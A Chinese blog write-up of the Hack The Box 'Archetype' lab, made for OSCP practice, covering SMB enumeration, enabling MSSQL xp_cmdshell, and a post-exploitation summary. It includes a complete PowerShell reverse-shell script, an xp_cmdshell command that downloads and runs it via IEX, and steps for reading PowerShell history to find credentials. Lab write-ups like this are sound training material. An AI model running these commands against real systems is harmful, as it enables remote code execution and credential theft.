0x01 前言
挺久没接触技术,最近准备考OSCP,就先拿Hack The Box里面的题目先练练手。
这个靶机是Starting Point Lab的机器Archetype,收获还是挺多的,记录一下。
0x02 过程
拿到ip先上nmap:
我刚开始扫的时候还没有3389这个端口,应该是free的共享靶机,大家都可以用的,穷啊~
看到445可以用smb工具来连接查看下有什么共享信息:
尝试了下面的共享只有backups这个disk可以进去,里面还有一个配置文件,直接get下来看看有什么:
看到了mssql的连接信息,应该就是对应nmap扫描出来的1433端口:
但这里出现了一个问题,靶机是共享的,1433端口被搞坏了。。。:
剩下的具体可以看下这篇文章:https://medium.com/@dpgg/hackthebox-archetype-starting-point-391af7b10fea
0x03 总结
1、smbclient命令
smbclient(选项)(参数)
-B<ip地址>:传送广播数据包时所用的IP地址;
-d<排错层级>:指定记录文件所记载事件的详细程度;
-E:将信息送到标准错误输出设备;
-h:显示帮助;
-i<范围>:设置NetBIOS名称范围;
-I<IP地址>:指定服务器的IP地址;
-l<记录文件>:指定记录文件的名称;
-L:显示服务器端所分享出来的所有资源;
-M<NetBIOS名称>:可利用WinPopup协议,将信息送给选项中所指定的主机;
-n<NetBIOS名称>:指定用户端所要使用的NetBIOS名称;
-N:不用询问密码;
-O<连接槽选项>:设置用户端TCP连接槽的选项;
-p<TCP连接端口>:指定服务器端TCP连接端口编号;
-R<名称解析顺序>:设置NetBIOS名称解析的顺序;
-s<目录>:指定smb.conf所在的目录;
-t<服务器字码>:设置用何种字符码来解析服务器端的文件名称;
-T<tar选项>:备份服务器端分享的全部文件,并打包成tar格式的文件;
-U<用户名称>:指定用户名称;
-w<工作群组>:指定工作群组名称。
连接服务器smbclient //192.168.0.1/tmp -U username%password
2、mssql开启xp_cmdshell
EXEC sp_configure 'Show Advanced Options', 1; \\使用sp_configure系统存储过程,设置服务器配置选项,将Show Advanced Options设置为1时,允许修改数据库的高级配置选项
reconfigure; \\确认上面的操作
sp_configure; \\查看当前sp_configure配置情况
EXEC sp_configure 'xp_cmdshell', 1 \\使用sp_configure系存储过程,启用xp_cmdshell参数,来允许SQL Server调用操作系统命令
reconfigure; \\确认上面的操作
xp_cmdshell "whoami" \\在靶机上调用cmdshell执行whoami
3、使用mssql的xp_cmdshell反弹shell
建立一个powershell的反向shell文件shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.33",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
使用python搭建一个迷你http服务器
python3 -m http.server 80
nc -nvvlp 443 //监听
数据库执行命令:
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.33/shell.ps1\");"
4、访问PowerShell历史记录文件
type C:\Users\username\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
5、使用psexec
官方文档:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
也可以使用Impacket的psexec.p y user@ip
- 原文作者: F0rmat
- 原文链接: https://xxe.icu/archetype.html
- 版权声明:本作品采用 署名 - 非商业性使用 4.0 国际 (CC BY-NC 4.0)进行许可,非商业转载请注明出处(作者,原文链接),商业转载请联系作者获得授权。